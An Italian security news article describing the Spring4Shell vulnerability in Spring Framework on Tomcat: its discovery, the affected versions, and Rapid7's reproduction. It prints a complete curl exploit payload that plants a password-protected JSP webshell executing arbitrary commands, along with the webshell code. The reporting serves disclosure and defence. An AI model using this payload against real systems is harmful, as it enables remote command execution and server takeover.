
Redazione RHC : 31 Marzo 2022 10:03
Una vulnerabilità nel popolare framework Spring per lo sviluppo di applicazioni Web Java espone potenzialmente molte applicazioni Web ad attacchi informatici remoti.
La vulnerabilità, soprannominata Spring4Shell e SpringShell, ha suscitato grande scalpore tra gli esperti di sicurezza nelle ultime 24 ore.
In particolare, i ricercatori di sicurezza hanno cercato di capire se il problema è nuovo o deriva da una vulnerabilità precedente.
Sponsorizza la prossima Red Hot Cyber Conference!Il giorno Lunedì 18 maggio e martedì 19 maggio 2026 9 maggio 2026, presso il teatro Italia di Roma (a due passi dalla stazione termini e dalla metro B di Piazza Bologna), si terrà la V edizione della la RHC Conference. Si tratta dell’appuntamento annuale gratuito, creato dalla community di RHC, per far accrescere l’interesse verso le tecnologie digitali, l’innovazione digitale e la consapevolezza del rischio informatico. Se sei interessato a sponsorizzare l'evento e a rendere la tua azienda protagonista del più grande evento della Cybersecurity Italiana, non perdere questa opportunità. E ricorda che assieme alla sponsorizzazione della conferenza, incluso nel prezzo, avrai un pacchetto di Branding sul sito di Red Hot Cyber composto da Banner più un numero di articoli che saranno ospitati all'interno del nostro portale. Quindi cosa stai aspettando? Scrivici subito a [email protected] per maggiori informazioni e per accedere al programma sponsor e al media Kit di Red Hot Cyber.
Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì. |
Secondo gli esperti di Praetorian e Flashpoint , la vulnerabilità è nuova e può essere sfruttata da remoto se l’applicazione Spring viene distribuita su un server Apache Tomcat con una configurazione comune.
Per sfruttare la vulnerabilità, un utente malintenzionato deve individuare e identificare le installazioni di applicazioni Web utilizzando DeserializationUtils. La vulnerabilità non interessa le applicazioni Spring che utilizzano Spring Boot e Tomcat incorporato.
Spring4Shell (a cui non è ancora stato assegnato un ID CVE) avrà probabilmente bisogno di un aggiornamento importante per garantire che le installazioni siano sicure, ha spiegato Richard Ford, direttore tecnico senior di Praetorian.
La vulnerabilità è molto facile da sfruttare, ha affermato Ford, e gli utenti dovranno installare gli aggiornamenti su cui Spring sta già lavorando il prima possibile. Secondo gli esperti di Flashpoint, non si discute ancora della vulnerabilità nella comunità dei criminali informatici.
Gli esperti di sicurezza delle informazioni sono venuti a conoscenza della vulnerabilità per la prima volta quando un ricercatore cinese ha pubblicato un tweet con uno screenshot di un attacco PoC.

Tuttavia, il tweet è stato presto cancellato, a quanto pare perché è un crimine in Cina pubblicare informazioni sulle vulnerabilità senza il permesso del governo. Su VX-Underground, le informazioni su Spring4Shell sono apparse a metà giornata del 30 marzo.
Avendo accesso agli screenshot, gli esperti di sicurezza sono stati in grado di decodificare l’exploit e riprodurre l’attacco in poche ore.
La vulnerabilità sembra (A detta di Rapid7) interessare le funzioni che utilizzano l’ annotazione @RequestMapping e i parametri POJO (Plain Old Java Object). Ecco un esempio in una dimostrazione MVC di Springframework :
package net.javaguides.springmvc.helloworld.controller;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.InitBinder;
import org.springframework.web.bind.annotation.RequestMapping;
import net.javaguides.springmvc.helloworld.model.HelloWorld;
@Controller
public class HelloWorldController {
@RequestMapping("/rapid7")
public void vulnerable(HelloWorld model) {
}
}
Un controller ( HelloWorldController), una volta caricato in Tomcat, gestirà le richieste HTTP a http://name/appname/rapid7. La funzione che gestisce la richiesta viene chiamata vulnerablee dispone di un parametro POJO HelloWorld. Qui, HelloWorldè ridotto ma POJO può essere piuttosto complicato se necessario:
package net.javaguides.springmvc.helloworld.model;
public class HelloWorld {
private String message;
}
Questa è l’intera condizione sfruttabile, almeno dalle versioni di Spring Framework da 4.3.0 a 5.3.15. (Non sono state esplorate le versioni indietro alla 4.3.0.)
Se compiliamo il progetto e lo ospitiamo su Tomcat, possiamo quindi sfruttarlo con il seguente comando curl. Nota quanto segue utilizza esattamente lo stesso payload dalla PoC creata dal ricercatore cinese.
curl -v -d "class.module.classLoader.resources.context.parent.pipeline
.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%
22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt
ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%
20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20
while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7
D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context
.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources
.context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl
assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl
ass.module.classLoader.resources.context.parent.pipeline.first.fileDat
eFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-
SNAPSHOT/rapid7
Questo payload rilascia una webshell protetta da password nella directory ROOT di Tomcat chiamata tomcatwar.jsp, e si presenta così:
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in
= -.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.
println(new String(b)); } } -
Gli aggressori possono a questo punto invocare i comandi al server.
Ecco un esempio di esecuzione whoamiper ottenere albinolobster:

La versione Java sembra avere importanza.
Il test su OpenJDK 1.8.0_312 non riesce, ma OpenJDK 11.0.14.1 funziona.
Redazione
Microsoft Teams riceverà un aggiornamento a dicembre 2025 che consentirà di monitorare la posizione dei dipendenti tramite la rete Wi-Fi dell’ufficio. Secondo la roadmap di Microsoft 365 , “quan...

Un’indagine condotta dall’Unione Europea di Radiodiffusione (EBU), con il supporto della BBC, ha messo in luce che i chatbot più popolari tendono a distorcere le notizie, modificandone il senso, ...

Spesso abbiamo citato questa frase: “Combattere il cybercrime è come estirpare le erbacce: se non le estirpi completamente rinasceranno, molto più vigorose di prima” e mai come ora risulta esser...

Per tre giorni consecutivi, dal 19 al 22 ottobre, il Comune di Caponago è rimasto isolato dal web a causa di un insolito incidente: una volpe è finita in un pozzetto della rete telefonica, danneggia...

Un’allerta globale è stata lanciata dalla Cybersecurity and Infrastructure Security Agency (CISA) degli Stati Uniti, riguardante lo sfruttamento attivo di una falla critica di esecuzione di codice ...